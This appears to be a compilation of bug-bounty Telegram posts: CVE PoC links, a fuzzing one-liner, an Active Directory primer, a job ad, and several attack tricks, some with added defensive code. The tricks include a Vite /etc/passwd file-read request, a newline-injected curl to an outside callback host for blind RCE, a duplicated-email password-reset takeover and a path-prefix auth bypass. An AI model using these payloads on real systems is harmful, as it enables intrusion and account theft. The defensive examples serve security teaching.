SecList for CyberStudents
Think outside the box
🔥 Forensics artifacts collection | inquisitor


An open-source digital forensics program for Windows OS that runs in both GUI and CLI form.

It is used to identify top services, information about resources, logs, events and other important data on the system.

Our Telegram channel: @best_master_uz_official
https://ab57.ru/cmdlist/icacls.html


https://ss64.com/nt/icacls.html

icacls: view and change file system ACLs (access control lists) on Windows

This command is relevant to privilege escalation: it shows and changes who can read, write or modify a file or directory.
Reference: https://github.com/minio/minio/security/advisories/ghsa-6xvq-wj2x-3h3q

Vuln: Information Disclosure

Severity: Critical

CVE-2023-28432

#POC #Pentest #Minio
POC —> https://www.exploit-db.com/exploits/51734

Minio 2022-07-29T19-40-48Z - Path traversal

CVE-2022-35919

#POC #Pentest #Minio
Discover Web Vulns Like a Pro! 🔥
Want to hunt XSS, SQLi, LFI, and SSRF on any site? Here’s a killer one-liner I’ve been using:


gau target.com | gf xss,lfi,sqli,ssrf | qsreplace FUZZ | ffuf -u FUZZ -w payloads/xss.txt,payloads/lfi.txt,payloads/sqli.txt,payloads/ssrf.txt -fr "FUZZ" | tee param_vulns.txt



What’s it do?
1️⃣ Grabs URLs: gau digs up every URL for target.com from the web’s archives.
2️⃣ Finds Weak Spots: gf filters for params ripe for hacking (XSS, SQLi, etc.).
3️⃣ Sets the Trap: qsreplace swaps values with FUZZ for testing.
4️⃣ Fuzzes Hard: ffuf blasts payloads from my custom lists—XSS popups, file leaks, you name it!
5️⃣ Saves the Loot: Results land in param_vulns.txt for you to exploit.


💡 Pro Tip: Add -t 50 to ffuf for speed, or -fc 404 to skip dead ends. Test responsibly!

Curious about hacking tricks like this? Join my crew at
https://discord.gg/u7uMFV833h for more tools, tips, and chaos. Dr
CVE-2025-30208 affects #Vite (prior to 6.2.3, 6.1.2, 6.0.12, 5.4.15, 4.5.10). When the dev server is exposed to the network (--host flag), it allows arbitrary file read, e.g. /etc/passwd or C:\Windows\win.ini, by appending ?raw?? or ?import&raw?? to the request.

PoC: https://1.2.3.4/etc/passwd?raw??

#BugBounty
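Added example, not from the post or the Vite project: a plain Node.js script that (a) decides whether an installed Vite version falls below the fixed releases the note lists, and (b) flags dev-server request lines that end in the ?raw?? or ?import&raw?? suffixes the note describes. The version logic is an assumption drawn from the note's list (each release line is fixed at the version given; lines without a fix are treated as affected if older than the newest fix), and the log lines are constructed.

```javascript
// Added example (not from the post or the Vite project). Fixed versions as
// listed in the note: anything below these, per release line, is affected.
const FIXED_VERSIONS = ["6.2.3", "6.1.2", "6.0.12", "5.4.15", "4.5.10"];

// "^5.4.14" / "v5.4.14" / "5.4.14-beta.1" -> [5, 4, 14]
function parseVersion(v) {
  const m = /^(\d+)\.(\d+)\.(\d+)/.exec(v.trim().replace(/^[\^~=v]/, ""));
  if (!m) throw new Error(`unparseable version: ${v}`);
  return m.slice(1, 4).map(Number);
}

function compareVersions(a, b) {
  for (let i = 0; i < 3; i++) {
    if (a[i] !== b[i]) return a[i] < b[i] ? -1 : 1;
  }
  return 0;
}

// Assumption: a version is affected when it is below the fix for its own
// major.minor line, or, when that line has no fix of its own, below the
// newest fixed release (6.2.3).
function isVulnerableViteVersion(version) {
  const v = parseVersion(version);
  const fixes = FIXED_VERSIONS.map(parseVersion);
  const sameLine = fixes.find((f) => f[0] === v[0] && f[1] === v[1]);
  if (sameLine) return compareVersions(v, sameLine) < 0;
  const newest = fixes.reduce((acc, f) => (compareVersions(f, acc) > 0 ? f : acc));
  return compareVersions(v, newest) < 0;
}

// Request-target detector for the two suffixes from the note.
const SUSPICIOUS_QUERY = /\?(?:import&)?raw\?\?\s*$/;

// logLines: "METHOD target" strings. Returns the 1-based line numbers and
// text of every request whose target ends in ?raw?? or ?import&raw??.
function flagSuspiciousRequests(logLines) {
  return logLines
    .map((text, i) => ({ line: i + 1, text }))
    .filter(({ text }) => SUSPICIOUS_QUERY.test(text.split(/\s+/)[1] || ""));
}

// Constructed sample log lines (not real traffic).
const SAMPLE_LOG = [
  "GET /src/main.ts",
  "GET /etc/passwd?raw??",
  "GET /C:/Windows/win.ini?import&raw??",
  "GET /src/App.vue?raw",
];

for (const v of ["5.4.14", "5.4.15", "6.2.2", "6.3.0"]) {
  console.log(v, isVulnerableViteVersion(v) ? "affected" : "not affected");
}
console.log(flagSuspiciousRequests(SAMPLE_LOG));
```

The version check is the part worth wiring into CI against the lockfile; the request matcher is only a quick triage aid for a dev server that was exposed with --host, since the real fix is upgrading and not binding the dev server to a reachable interface.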
JavaScript Static Analysis - Locate Dangerous Functions

• An open-source analysis tool to detect vulnerabilities in code is Semgrep. You can configure your own detection rules or use rules created by the community.

• Interesting functions and properties in JavaScript are for example:
Element.innerHTML, eval(), window.postMessage(), window.addEventListener(), window.localStorage, window.sessionStorage, document.cookie


#bugbounty #pentest #bugbountyTips
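Added example, not from the post and not Semgrep: a small grep-style scanner in plain Node.js that reports each of the sinks and sources listed above with a line number and a review note, so hits can be triaged by hand. The pattern list, the comment-stripping rule and the sample source are constructed; a real Semgrep rule works on the AST and avoids the false positives a line regex can produce.

```javascript
// Added example (not from the post; not Semgrep). One regex per interesting
// function/property from the list, plus the question to ask when it is found.
const PATTERNS = [
  { name: "innerHTML", re: /\.innerHTML\s*\+?=/, note: "HTML sink: untrusted data here is XSS" },
  { name: "eval", re: /\beval\s*\(/, note: "code execution sink" },
  { name: "postMessage", re: /\.postMessage\s*\(/, note: "check targetOrigin is not '*'" },
  { name: "addEventListener", re: /addEventListener\s*\(/, note: "if it handles 'message', verify event.origin" },
  { name: "localStorage", re: /\blocalStorage\b/, note: "readable by any script on the origin" },
  { name: "sessionStorage", re: /\bsessionStorage\b/, note: "readable by any script on the origin" },
  { name: "document.cookie", re: /document\.cookie/, note: "cookie read/write from script" },
];

// Returns one finding per (line, pattern) pair. Trailing // comments are
// dropped before matching; block comments and strings are not handled, which
// is the usual weakness of a line-based scanner.
function findDangerousSinks(source) {
  const findings = [];
  source.split(/\r?\n/).forEach((text, idx) => {
    const code = text.replace(/\/\/.*$/, "");
    for (const p of PATTERNS) {
      if (p.re.test(code)) {
        findings.push({ line: idx + 1, sink: p.name, note: p.note, text: text.trim() });
      }
    }
  });
  return findings;
}

// Constructed sample source (not from any real project).
const SAMPLE_SOURCE = `
const q = new URLSearchParams(location.search).get("q");
document.getElementById("out").innerHTML = q;          // reflected into the DOM
window.addEventListener("message", (e) => eval(e.data));
// eval("only a comment, must not be reported");
localStorage.setItem("token", document.cookie);
frames[0].postMessage({ token: "x" }, "*");
`;

for (const f of findDangerousSinks(SAMPLE_SOURCE)) {
  console.log(`line ${f.line}: ${f.sink} -> ${f.note}\n    ${f.text}`);
}
```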
Active Directory (AD) is a directory service developed by Microsoft for Windows domain networks. It is used to manage and organize computers, users, and resources within a network. AD provides authentication and authorization services, allowing administrators to control access to network resources efficiently.

Key Components of Active Directory:

1. Domain Controller (DC) – A server that stores AD data and handles authentication.

2. Organizational Units (OUs) – Logical containers for organizing users, groups, and computers.

3. Groups & Users – Define permissions and access control.

4. Group Policy (GPO) – Used to enforce security settings and configurations.

5. Forest & Domains – A hierarchical structure that organizes multiple AD domains.
Education and experience:
2–5 years of experience in network security.
Deep knowledge of network protocols and technologies (BGP, OSPF, VLAN, IPsec).
Skills and knowledge:
Administration and configuration of SIEM systems (Splunk, QRadar).
Experience with WAF, DLP, PAM, IAM.
Work with NGFW (Next-Gen Firewall) and firewalls (FortiGate, Palo Alto, Cisco ASA).
Vulnerability analysis and penetration testing (pentest).
Advanced-level experience with Linux/Windows.
Desirable certificates:
Cisco CCNP Security
Fortinet NSE 4-7

@sherzodubaydullaev

A Junior Network Engineer would also be fine.
Forwarded from OSINT
India has begun a crackdown on OSINT platforms

#OSINT #News

Indian authorities have declared a hunt for OSINT services that collect and sell leaks, hacked databases and darknet data. The official statement notes that such activities violate personal data laws and pose a threat to national security.

⚠️ Platforms that work with leaked data, the dark web and hack dumps are now targeted: law enforcement and intelligence agencies will handle blocking them and criminal prosecution.

🔗 Read more: The420.in

LH | News | Courses | OSINT
POC: https://github.com/MuhammadWaseem29/CVE-2025-24799/tree/main

Pre-Auth SQL Injection
CVE-2025-24799
Severity: Critical

#CVE
Forwarded from Brut Security (Emon Shaikh)
🔥Never forget to check for blind RCE!💥

I was testing a login panel and had a gut feeling the username field might be vulnerable. I tried some classic payloads like:

;id | whoami & uname

But... the firewall detected and blocked them all.
Even when I tried curl or ping for blind RCE — still blocked.

Then I thought: maybe the WAF is only scanning the first line of the input? So why not try a little trick?

Payload idea: Inject a newline before the actual payload:

attacker'%0acurl https://tluxnubdqopuwecbljrj5i6tot8ddd64b.oast.fun

(Use %0a for newline — URL encoded)

And boom — Blind RCE triggered! My server got the hit instantly.

Cybersecurity isn’t about effort — it’s about mindset. Deep thinking always wins over brute force.❤️
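Added example, not part of the forwarded post: the weakness it describes is a filter that only looks at the first line of a field. The plain Node.js code below contrasts such a filter with server-side validation that percent-decodes the value and rejects control characters outright, so a newline cannot split the check. The inputs are constructed and the callback domain from the post is replaced by a placeholder.

```javascript
// Added example (not from the post). Shell metacharacters a naive filter
// looks for; note the apostrophe is not in the set, as in the post.
const SHELL_META = /[;&|`$(){}<>\\]/;

// Simulates a filter that decodes the value and inspects only its first
// line. Everything after the first newline is never examined.
function naiveFirstLineFilter(rawValue) {
  let decoded;
  try {
    decoded = decodeURIComponent(rawValue);
  } catch {
    return "allowed"; // fails open on malformed encoding
  }
  const firstLine = decoded.split("\n")[0];
  return SHELL_META.test(firstLine) ? "blocked" : "allowed";
}

// Server-side validation: decode, reject CR/LF/NUL and the rest of the C0
// range, then enforce a strict allow-list for usernames. The decision is
// independent of line structure, and the value never reaches a shell.
function validateUsername(rawValue) {
  let value;
  try {
    value = decodeURIComponent(rawValue);
  } catch {
    return { ok: false, reason: "malformed percent-encoding" };
  }
  if (/[\u0000-\u001f\u007f]/.test(value)) {
    return { ok: false, reason: "control character in username" };
  }
  if (!/^[A-Za-z0-9._-]{1,64}$/.test(value)) {
    return { ok: false, reason: "character outside allowed set" };
  }
  return { ok: true, value };
}

// Constructed inputs: a normal username, a classic injection attempt, and the
// newline-prefixed shape from the post with a placeholder domain.
const INPUTS = [
  "alice",
  "alice;id",
  "attacker'%0acurl https://OAST-DOMAIN-PLACEHOLDER",
];

for (const input of INPUTS) {
  console.log(
    JSON.stringify(input),
    "| first-line filter:", naiveFirstLineFilter(input),
    "| validator:", JSON.stringify(validateUsername(input)),
  );
}
```

The point of the contrast: the first-line filter passes the third input for the same reason the WAF in the post did, while the validator rejects it before any metacharacter check matters, because a newline has no business in a username at all.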
Password Reset Bypass Trick 🌀

Some poorly secured endpoints accept multiple email parameters.😳

Try this:

POST /passwordReset HTTP/1.1 
Content-Type: application/x-www-form-urlencoded 

[email protected]&[email protected]

Or in JSON:

{
  "email": ["[email protected]", "[email protected]"]
}

If the app sends the reset link to both emails… you’re in.
Now imagine if the victim is an admin — hello dashboard, hello bounty!💰

#bugbountytips
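Added example, not from the post: plain Node.js code showing how a reset handler ends up mailing two addresses when it trusts the parsed body as-is (repeated form keys become a list, JSON arrays pass straight through), beside a hardened extractor that accepts exactly one string value that looks like an address. Request bodies use constructed example.com / example.net addresses; the handler and parsing behaviour are assumptions, not any particular framework's code.

```javascript
// Added example (not from the post). Trusting extraction: every "email" value
// found in the body becomes a recipient, which is the bug the post exploits.
function naiveRecipients(contentType, body) {
  if (contentType.startsWith("application/json")) {
    const email = JSON.parse(body).email;
    return Array.isArray(email) ? email : [email];
  }
  return new URLSearchParams(body).getAll("email");
}

// Deliberately simple shape check; a real service also verifies the account
// exists and rate-limits reset requests.
const EMAIL_RE = /^[^\s@]+@[^\s@]+\.[^\s@]+$/;

// Hardened extraction: exactly one "email" value, it must be a string, and it
// must look like a single address. Anything else is rejected before any mail
// is sent, so a second address can never ride along.
function extractSingleEmail(contentType, body) {
  let values;
  if (contentType.startsWith("application/json")) {
    let parsed;
    try {
      parsed = JSON.parse(body);
    } catch {
      return { ok: false, reason: "invalid JSON" };
    }
    if (typeof parsed !== "object" || parsed === null) {
      return { ok: false, reason: "body is not an object" };
    }
    values = "email" in parsed ? [parsed.email] : [];
  } else {
    values = new URLSearchParams(body).getAll("email");
  }
  if (values.length !== 1) {
    return { ok: false, reason: `expected exactly one email, got ${values.length}` };
  }
  const email = values[0];
  if (typeof email !== "string") return { ok: false, reason: "email must be a string" };
  if (!EMAIL_RE.test(email)) return { ok: false, reason: "malformed email" };
  return { ok: true, email: email.toLowerCase() };
}

// Constructed request bodies.
const FORM = "application/x-www-form-urlencoded";
const JSON_CT = "application/json";
const FORM_TWO = "email=victim%40example.com&email=attacker%40example.net";
const JSON_TWO = '{"email":["victim@example.com","attacker@example.net"]}';
const FORM_ONE = "email=victim%40example.com";

console.log("naive, form:    ", naiveRecipients(FORM, FORM_TWO));
console.log("naive, json:    ", naiveRecipients(JSON_CT, JSON_TWO));
console.log("hardened, form: ", extractSingleEmail(FORM, FORM_TWO));
console.log("hardened, json: ", extractSingleEmail(JSON_CT, JSON_TWO));
console.log("hardened, one:  ", extractSingleEmail(FORM, FORM_ONE));
```

Rejecting rather than "taking the first one" matters: picking values[0] still leaves the application guessing which address the client meant, and a different framework may pick the last. Counting and refusing is the only unambiguous rule.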
🔥You can find💥
broken access control / IDOR vulnerabilities
using this simple trick (effective on .NET web apps and sometimes on PHP-based web apps)🧐😎

target.com/hidden: this page requires authentication, or redirects to the /login page.

Try: target.com/login/hidden

OMG! Auth bypass
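Added example, not from the post: plain Node.js code showing the kind of request guard that produces this bypass (public routes matched by path prefix, so anything under /login is treated as public) next to a guard that decodes and normalizes the path and matches public routes exactly. The route table and requests are constructed; the case-folding step is an assumption for hosts with case-insensitive routing, which the post associates with .NET apps.

```javascript
// Added example (not from the post). Routes that do not need a session.
const PUBLIC_ROUTES = new Set(["/login", "/logout", "/static"]);

// Broken: prefix test. "/login/hidden", "/LOGIN/hidden" and
// "/login/../hidden" all start with a public prefix and get through.
function isPublicByPrefix(rawPath) {
  const p = rawPath.toLowerCase();
  return [...PUBLIC_ROUTES].some((route) => p.startsWith(route));
}

// Decode, drop the query string, collapse "." and ".." segments, ignore empty
// segments (double or trailing slashes) and lowercase for case-insensitive
// hosts. The result is the path the application will actually serve.
function normalizePath(rawPath) {
  const noQuery = rawPath.split("?")[0];
  let decoded;
  try {
    decoded = decodeURIComponent(noQuery);
  } catch {
    decoded = noQuery;
  }
  const out = [];
  for (const seg of decoded.split("/")) {
    if (seg === "" || seg === ".") continue;
    if (seg === "..") { out.pop(); continue; }
    out.push(seg.toLowerCase());
  }
  return "/" + out.join("/");
}

// Fixed: exact match on the normalized path. Only /static/* is a prefix
// exemption, and it is stated explicitly rather than falling out of a
// startsWith over every public route.
function isPublicExact(rawPath) {
  const p = normalizePath(rawPath);
  return PUBLIC_ROUTES.has(p) || p.startsWith("/static/");
}

// Pipeline decision: public routes are served to anyone; everything else
// needs an authenticated session.
function decide(rawPath, hasSession, guard) {
  return (guard(rawPath) || hasSession) ? "allow" : "redirect-to-login";
}

// Constructed unauthenticated requests.
const REQUESTS = ["/hidden", "/login", "/login/hidden", "/LOGIN/hidden", "/login/../hidden", "/static/app.css"];
for (const r of REQUESTS) {
  console.log(
    r.padEnd(18),
    "prefix guard:", decide(r, false, isPublicByPrefix).padEnd(18),
    "exact guard:", decide(r, false, isPublicExact),
  );
}
```

The deny-by-default shape is the real fix: the guard answers "is this specific route public?", never "does this path look like it belongs to a public area?", and it does so on the normalized path the server will route, not the raw string the client sent.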